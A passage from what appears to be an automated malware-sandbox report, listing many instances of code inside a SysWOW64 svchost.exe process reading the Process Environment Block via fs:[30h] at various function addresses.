            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F403E9 mov eax, dword ptr fs:[00000030h]2_2_02F403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov ecx, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE3DB mov eax, dword ptr fs:[00000030h]2_2_02FDE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD43D4 mov eax, dword ptr fs:[00000030h]2_2_02FD43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC3CD mov eax, dword ptr fs:[00000030h]2_2_02FEC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]2_2_02F3A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F383C0 mov eax, dword ptr fs:[00000030h]2_2_02F383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB63C0 mov eax, dword ptr fs:[00000030h]2_2_02FB63C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300625D mov eax, dword ptr fs:[00000030h]2_2_0300625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28397 mov eax, dword ptr fs:[00000030h]2_2_02F28397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2E388 mov eax, dword ptr fs:[00000030h]2_2_02F2E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5438F mov eax, dword ptr fs:[00000030h]2_2_02F5438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD437C mov eax, dword ptr fs:[00000030h]2_2_02FD437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov ecx, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB035C mov eax, dword ptr fs:[00000030h]2_2_02FB035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA352 mov eax, dword ptr fs:[00000030h]2_2_02FFA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8350 mov ecx, dword ptr fs:[00000030h]2_2_02FD8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB2349 mov eax, dword ptr fs:[00000030h]2_2_02FB2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030062D6 mov eax, dword ptr fs:[00000030h]2_2_030062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C310 mov ecx, dword ptr fs:[00000030h]2_2_02F2C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50310 mov ecx, dword ptr fs:[00000030h]2_2_02F50310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A30B mov eax, dword ptr fs:[00000030h]2_2_02F6A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02F2C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F720F0 mov ecx, dword ptr fs:[00000030h]2_2_02F720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02F2A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F380E9 mov eax, dword ptr fs:[00000030h]2_2_02F380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB60E0 mov eax, dword ptr fs:[00000030h]2_2_02FB60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB20DE mov eax, dword ptr fs:[00000030h]2_2_02FB20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov eax, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02FF60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F280A0 mov eax, dword ptr fs:[00000030h]2_2_02F280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC80A8 mov eax, dword ptr fs:[00000030h]2_2_02FC80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004164 mov eax, dword ptr fs:[00000030h]2_2_03004164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3208A mov eax, dword ptr fs:[00000030h]2_2_02F3208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5C073 mov eax, dword ptr fs:[00000030h]2_2_02F5C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F32050 mov eax, dword ptr fs:[00000030h]2_2_02F32050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB6050 mov eax, dword ptr fs:[00000030h]2_2_02FB6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6030 mov eax, dword ptr fs:[00000030h]2_2_02FC6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A020 mov eax, dword ptr fs:[00000030h]2_2_02F2A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C020 mov eax, dword ptr fs:[00000030h]2_2_02F2C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E016 mov eax, dword ptr fs:[00000030h]2_2_02F4E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030061E5 mov eax, dword ptr fs:[00000030h]2_2_030061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4000 mov ecx, dword ptr fs:[00000030h]2_2_02FB4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD2000 mov eax, dword ptr fs:[00000030h]2_2_02FD2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F601F8 mov eax, dword ptr fs:[00000030h]2_2_02F601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02FAE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF61C3 mov eax, dword ptr fs:[00000030h]2_2_02FF61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB019F mov eax, dword ptr fs:[00000030h]2_2_02FB019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2A197 mov eax, dword ptr fs:[00000030h]2_2_02F2A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F70185 mov eax, dword ptr fs:[00000030h]2_2_02F70185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEC188 mov eax, dword ptr fs:[00000030h]2_2_02FEC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4180 mov eax, dword ptr fs:[00000030h]2_2_02FD4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2C156 mov eax, dword ptr fs:[00000030h]2_2_02F2C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC8158 mov eax, dword ptr fs:[00000030h]2_2_02FC8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36154 mov eax, dword ptr fs:[00000030h]2_2_02F36154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov ecx, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC4144 mov eax, dword ptr fs:[00000030h]2_2_02FC4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60124 mov eax, dword ptr fs:[00000030h]2_2_02F60124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov ecx, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDA118 mov eax, dword ptr fs:[00000030h]2_2_02FDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF0115 mov eax, dword ptr fs:[00000030h]2_2_02FF0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov eax, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDE10E mov ecx, dword ptr fs:[00000030h]2_2_02FDE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02FAE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB06F1 mov eax, dword ptr fs:[00000030h]2_2_02FB06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02F6A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F666B0 mov eax, dword ptr fs:[00000030h]2_2_02F666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02F6C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34690 mov eax, dword ptr fs:[00000030h]2_2_02F34690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F62674 mov eax, dword ptr fs:[00000030h]2_2_02F62674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF866E mov eax, dword ptr fs:[00000030h]2_2_02FF866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A660 mov eax, dword ptr fs:[00000030h]2_2_02F6A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4C640 mov eax, dword ptr fs:[00000030h]2_2_02F4C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4E627 mov eax, dword ptr fs:[00000030h]2_2_02F4E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F66620 mov eax, dword ptr fs:[00000030h]2_2_02F66620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F68620 mov eax, dword ptr fs:[00000030h]2_2_02F68620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3262C mov eax, dword ptr fs:[00000030h]2_2_02F3262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72619 mov eax, dword ptr fs:[00000030h]2_2_02F72619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAE609 mov eax, dword ptr fs:[00000030h]2_2_02FAE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4260B mov eax, dword ptr fs:[00000030h]2_2_02F4260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F347FB mov eax, dword ptr fs:[00000030h]2_2_02F347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F527ED mov eax, dword ptr fs:[00000030h]2_2_02F527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02FBE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02F3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB07C3 mov eax, dword ptr fs:[00000030h]2_2_02FB07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]2_2_02F307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE47A0 mov eax, dword ptr fs:[00000030h]2_2_02FE47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]2_2_02FD678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]2_2_02F38770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]2_2_02F40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]2_2_02F30750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]2_2_02FBE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]2_2_02F72750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]2_2_02FB4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]2_2_02F6674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]2_2_02F6273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]2_2_02FAC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]2_2_02F6C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]2_2_02F30710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]2_2_02F60710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]2_2_02F6C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]2_2_03004500
